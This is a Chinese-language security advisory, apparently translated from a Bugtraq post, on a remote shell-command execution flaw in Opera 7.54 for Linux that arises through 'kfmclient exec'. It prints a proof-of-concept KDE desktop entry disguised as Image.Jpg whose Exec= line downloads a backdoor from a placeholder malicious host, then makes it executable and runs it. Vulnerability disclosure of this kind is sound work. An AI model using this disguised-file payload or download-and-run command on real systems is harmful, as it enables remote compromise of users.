安全研究
安全漏洞
Opera kfmclient远程任意SHELL命令执行漏洞
发布日期:2004-12-13
更新日期:2004-12-14
受影响系统:Opera Software Opera Web Browser 7.54
描述:
Opera for Linux使用"kfmclient exec"作为默认应用程序处理保存文件。
"kfmclient exec"在处理文件名时存在问题,远程攻击者可以利用这个漏洞以用户进程权限执行任意SHELL命令。
实际上"kfmclient exec"命令可用于打开"Kde Desktop Entry",然后执行"Exec="中的命令。利用此漏洞需要一个特殊的文件名扩展,如果page.Htm用于文件名,并"kfmclient exec page.Htm"被打开,那么"Exec="中的命令就会执行,相反,如果"page.htm"用于文件名,那么就会作为"kde desktop entry"打开,被konqueror查看,因此如果构建一个名为Image.Jpg文件,包含如下条目:
--------image.Jpg----------
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c
wget\t
http://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
---- end of image.Jpg-------
当目标用户选择"Open"查看image.Jpg时,会被"kfmclient exec"打开而执行SHELL命令。
<*来源:Giovanni Delvecchio (
badpenguin79@hotmail.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=110297235619877&w=2
*>
建议:
厂商补丁:
Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.opera.com浏览次数:3412
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |